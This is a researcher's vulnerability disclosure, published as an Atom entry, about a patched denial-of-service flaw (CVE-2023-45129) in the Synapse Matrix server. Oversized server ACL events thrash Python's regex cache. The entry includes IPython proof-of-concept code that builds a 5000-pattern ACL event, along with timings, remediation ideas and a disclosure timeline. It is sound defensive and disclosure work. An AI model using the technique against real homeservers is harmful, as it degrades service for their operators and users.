<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="/_stylesheets/atom_stylesheet.xsl"?>
<entry
        xmlns="http://www.w3.org/2005/Atom"
        xmlns:pktz="https://pktz.fr/schema/"
>
    <title>ACL cache thrashing Synapse</title>
    <id>https://pktz.fr/matrix/security/2023-synapse-acl-cache/</id>
    <published>2023-10-17T00:00:00Z</published>
    <updated>2023-10-17T00:00:00Z</updated>
    <author>
        <name>Val Lorentz</name>
        <uri>https://valentin-lorentz.fr/</uri>
    </author>
    <pktz:keywords>
        Matrix, Synapse, CVE-2023-45129, GHSA-5chr-wjw5-3gq4
    </pktz:keywords>
    <content type="xhtml" xml:lang="en">
        <div xmlns="http://www.w3.org/1999/xhtml">
            <pktz:toc />

            <section>
            <h2 id="introduction">Introduction</h2>

<p>
    This article is a copy of a report I sent to Element through their YesWeHack bug bounty program.
    The vulnerability was <a href="https://github.com/matrix-org/synapse/security/advisories/GHSA-5chr-wjw5-3gq4">patched in Synapse 1.94.0</a>.
</p>

            </section>
            <section>
            <h2 id="description">Description</h2>

<p>
    On every batch of incoming PDUs, Synapse checks the sender against the list of hostname patterns in the <code>m.room.server_acl</code> state event of the destination room.
    <br/>
    This event contains a list of patterns, which can contain wildcards; each pattern is translated to a regexp and passed to Python's <code>re</code> module, which compiles and runs it.
</p>
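<p>
    Concretely, the translation works along these lines (a hypothetical sketch for illustration, not Synapse's actual code; the name <code>glob_to_regex</code> is mine):
</p>

```python
import re

def glob_to_regex(glob: str) -> "re.Pattern[str]":
    """Sketch of the wildcard-to-regexp translation: '*' matches any
    sequence of characters, '?' a single one, and everything else is
    escaped so it only matches literally."""
    parts = []
    for c in glob:
        if c == "*":
            parts.append(".*")
        elif c == "?":
            parts.append(".")
        else:
            parts.append(re.escape(c))
    return re.compile("".join(parts) + r"\Z")

# A deny pattern like "*.evil.uk" then matches any subdomain:
assert glob_to_regex("*.evil.uk").match("sub.evil.uk")
assert not glob_to_regex("*.evil.uk").match("legit.example")
```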

<p>
    This is all usually pretty quick (~0.6ms with 500 patterns on a modern CPU; I used a Ryzen 5 PRO 5650G), but there is a degenerate case that can make it much slower (up to ~100ms).
</p>
            </section>
            <section>
            <h2 id="exploitation">Exploitation</h2>

<p>
    The annoying part is the regexp compilation, which takes ~20µs per regexp. This is usually unnoticeable, because Python has a 512-entry LRU cache and one doesn't usually compile this many regexps.
</p>
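<p>
    This cache limit is visible in CPython's own internals. A quick way to see it, relying on the private attributes <code>re._MAXCACHE</code> and <code>re._cache</code> (implementation details, so they may change between versions):
</p>

```python
import re

re.purge()  # start from an empty internal pattern cache
for i in range(600):
    re.compile(f"pattern{i}")

# CPython caps the cache at re._MAXCACHE entries (512 in current
# versions) and evicts entries once it is full, so compiling 600
# distinct patterns cannot keep them all cached.
print(re._MAXCACHE)
print(len(re._cache))  # never exceeds re._MAXCACHE
```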

<p>
    However, large <code>m.room.server_acl</code> events cause a 100% cache miss rate, by compiling over 512 patterns in the same order over and over. Here is an example of this threshold behavior (in an IPython shell, which provides the neat <code>%timeit</code> command):
</p>

<pre>
<![CDATA[
In [1]: import re

In [2]: l = [f'example{i}' for i in range(500)]

In [3]: re.purge()  # clear the cache, just to be safe

In [4]: %timeit for s in l:  re.compile(s)
71.5 µs ± 209 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each)

In [5]: l = [f'example{i}' for i in range(550)]

In [6]: re.purge()  # clear the cache again

In [7]: %timeit for s in l:  re.compile(s)
6.37 ms ± 42.4 µs per loop (mean ± std. dev. of 7 runs, 100 loops each)
]]>
</pre>

<p>
    As you can see, compiling 550 patterns instead of 500 makes the whole loop about 100 times slower.
</p>

<p>
    By setting an <code>m.room.server_acl</code> event with over 512 patterns (in fact, the more the better) in a room, one can slow down the event throughput of Synapse's federation workers.
    In the examples below, I will use <code>["e0.uk", "e1.uk", ..., "e4999.uk"]</code>, which has many patterns but is small enough to fit in a PDU.
    <br />
    As a proof of concept, again in an IPython shell:
</p>

<pre>
<![CDATA[
In [1]: from synapse.federation.federation_server import server_matches_acl_event; from tests.federation.test_federation_server import _create_acl_event; import re, json

In [2]: e = _create_acl_event({"allow": ["*"], "deny": [f"e{i}.uk" for i in range(500)]})  # build a "small" m.room.server_acl event

In [3]: re.purge()

In [4]: %timeit server_matches_acl_event("evil.com", e)
620 µs ± 849 ns per loop (mean ± std. dev. of 7 runs, 1,000 loops each)

In [5]: e = _create_acl_event({"allow": ["*"], "deny": [f"e{i}.uk" for i in range(5000)]})  # larger m.room.server_acl event

In [6]: re.purge()

In [7]: %timeit server_matches_acl_event("evil.com", e)
115 ms ± 719 µs per loop (mean ± std. dev. of 7 runs, 10 loops each)

In [8]: len(json.dumps({"allow": ["*"], "deny": [f"e{i}.uk" for i in range(5000)]}))  # check it's well under the PDU limit <https://github.com/matrix-org/synapse/blob/3b0083c92adf76daf4161908565de9e5efc08074/synapse/api/constants.py#L25>
Out[8]: 58916
]]>
</pre>

<p>
    By setting such a large <code>m.room.server_acl</code> event, every Synapse server in the room will waste ~100ms on every incoming batch of PDUs for the room, from any other server. This means a single worker can be tied up by as few as 10 events per second in that room.
</p>

            </section>
            <section>
            <h2 id="risk">Risk</h2>

<p>
    Abusers who can join a room they control from a specific homeserver can make that homeserver considerably slower.
    <br />
    Actually, this is already happening accidentally in <a href="matrix:r/matrix:matrix.org">Matrix HQ</a>, which currently has 623 banned hostnames, enough to make checks take 13ms:
</p>

<pre>
<![CDATA[
In [9]: e = _create_acl_event({"allow": ["*"], "deny": [f"e{i}.uk" for i in range(600)]})

In [10]: re.purge()

In [11]: %timeit server_matches_acl_event("evil.com", e)
13.1 ms ± 25.9 µs per loop (mean ± std. dev. of 7 runs, 100 loops each)
]]>
</pre>

<p>
    And even when Matrix HQ had fewer than 512 hostnames, having its incoming PDUs interleaved with those of other rooms using different patterns might have partially triggered the degenerate case.
</p>
            </section>
            <section>
            <h2 id="remediation">Remediation</h2>

<aside>
    <p>
        Synapse fixed the issue by <a href="https://github.com/matrix-org/synapse/pull/16360">entirely rewriting their ACL matching in Rust</a>.
        <br />
        For the sake of completeness, this section describes my initial suggestions to Synapse developers.
    </p>
</aside>

<p>
    A quick workaround would be for Synapse to use a larger cache. For example, with 5M entries in the cache, triggering the degenerate case would require setting up 1000 such rooms and sending PDUs to them in a constant order. That might be good enough. (And it definitely avoids the accidental case.)
</p>
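<p>
    Such a larger cache could be layered in front of <code>re.compile</code> without touching its internals. A minimal sketch, assuming a simple per-process cache (the helper name <code>compile_cached</code> is mine):
</p>

```python
import re
from functools import lru_cache

# Sketch of the workaround: a much larger LRU cache in front of
# re.compile, so that large ACL lists no longer thrash Python's
# 512-entry internal cache. (5M entries, as suggested above.)
@lru_cache(maxsize=5_000_000)
def compile_cached(pattern: str) -> "re.Pattern[str]":
    return re.compile(pattern)

p1 = compile_cached(r"e[0-9]+\.uk")
p2 = compile_cached(r"e[0-9]+\.uk")
assert p1 is p2  # second call is a cache hit: no recompilation
```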

<p>
    Fixing it completely is hard, though. When my own software (an IRC bot) accidentally hit this case, <a href="https://github.com/progval/Limnoria/blob/922b00c8c31b888a0c567e51c335fa07ae08007a/src/ircutils.py#L224-L269">I implemented my own cache, which never expires compiled regexps as long as the original hostmask is still used somewhere</a>.
    <br />
    But that only works because IRC bots keep the whole hostmask set in memory from startup to shutdown. That probably wouldn't work for Synapse workers, which have to fetch it from the database every time.
</p>

<p>
    An option that might work for Synapse would be to write every room's compiled regexps to a more persistent cache (e.g. PostgreSQL), serialized with Python's <code>pickle</code> module. This seems to give a nice runtime:
</p>

<pre>
<![CDATA[
In [1]: import re, pickle

In [2]: l = [f'example{i}' for i in range(550)]

In [3]: pickled_l = pickle.dumps(l)

In [4]: %timeit pickle.loads(pickled_l)
13.2 µs ± 43.8 ns per loop (mean ± std. dev. of 7 runs, 100,000 loops each)
]]>
</pre>

            </section>
            <section>
            <h2 id="timeline">Timeline</h2>
<dl>
    <dt><time>2023-03-22</time></dt>
    <dd>Reported to Element through their YesWeHack bug bounty program.</dd>
    <dt><time>2023-07-03</time></dt>
    <dd>Confirmed by Element, who awarded me a bug bounty.</dd>
    <dt><time>2023-09-21</time></dt>
    <dd><a href="https://github.com/matrix-org/synapse/pull/16360">Synapse developers at Element wrote a patch</a>.</dd>
    <dt><time>2023-09-26</time></dt>
    <dd>The patch was merged.</dd>
    <dt><time>2023-10-10</time></dt>
    <dd><a href="https://github.com/matrix-org/synapse/releases/tag/v1.94.0">Synapse 1.94.0</a> was released with the patch.</dd>
    <dt><time>2023-10-14</time></dt>
    <dd>I noticed the fix and asked Element for news on the status of my report.</dd>
    <dt><time>2023-10-17</time></dt>
    <dd>Element confirmed that the issue was indeed fixed and public.</dd>
</dl>
            </section>
        </div>
    </content>
</entry>
